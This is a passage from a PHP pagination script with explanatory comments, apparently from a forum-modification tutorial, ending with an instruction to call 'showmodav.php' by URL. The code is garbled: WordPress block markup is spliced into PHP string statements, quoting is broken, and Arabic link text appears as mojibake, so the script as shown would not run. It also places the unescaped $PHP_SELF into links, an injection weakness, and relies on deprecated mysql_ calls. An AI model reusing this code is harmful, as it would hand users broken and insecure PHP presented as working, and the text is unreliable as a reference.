until $i is greater than $numofpages (4.08). */ if($i!= $page){ $theout.=("<a href="\"$PHP_SELF?&page=$i\"">[$i]</a> "); }else{ $theout.=("[".$i."] "); } /* This if statement will not make the current page number available in link form. It will, however, make all other pages available in link form. */ } // This ends the for loop if(($totalrows % $limit) != 0){ if($i != $page){ $theout.=("<a href="\"$PHP_SELF?&page=$i\"">[$i]</a> "); }else{ $theout.=("[".$i."] "); } /* This is the exact statement that turns pages into link form that is used above */ } // Ends the if statement if(($totalrows - ($limit * $page)) > 0){ /* This statement checks to see if there are more rows remaining, meaning there are pages in front of the current one. */ $temppage=$page; $pagenext = $temppage+1; // Fancy way of adding 1 to page $theout.=("<a href="\"$PHP_SELF?page=$pagenext\""> ÇáÊÇáí>> </a>"); /* Since there are pages remaining, this outputs NEXT in link form. */ }else{ $theout.=(" ÇáÊÇáí>> "); /* If we're on the last page possible, NEXT will NOT be displayed in link form. */ } mysql_free_result($result); /* This line is not required, since MySQL will free the result after all scripts have finished executing; however, it's a nice little backup. */ // The next line tells the server to stop parsing PHP $theout.= "</center> <!-- /wp:html --> $theout.= ""; $theout.= "; <!-- wp:html --> <center>"; $theout.= "test $totalmod"; $theout.= "</center> <!-- /wp:html --> /* useful hints for dates functionality $yesterday = mktime(0,0,0,date("m"),date("d")-1,date("y")); $today = mktime(0,0,0,date("m"),date("d"),date("y")); $tomorrow = mktime(0,0,0,date("m"),date("d")+1,date("y")); $lastmonth = mktime(0,0,0,date("m")-1,date("d"),date("y")); $lastyear = mktime(0,0,0,date("m"),date("d"),date("y")-1); $nextyear = mktime(0,0,0,date("m"),date("d"),date("y")+1); $yesterday = strftime("%A %B %d, %Y",$yesterday); $today = strftime("%A %B %d, %Y",$today); $tomorrow = strftime("%A %B %d, %Y",$tomorrow); $lastmonth = strftime("%A %B %d, %Y",$lastmonth); $nextmonth = strftime("%A %B %d, %Y",$nextmonth); $lastyear = strftime("%A %B %d, %Y",$lastyear); $nextyear = strftime("%A %B %d, %Y",$nextyear); */ $templater->register('theout', $theout); //print_output($templater->render()); //end of code ?
Now call the script by the following url:
http://www.yoursite.com/showmodav.php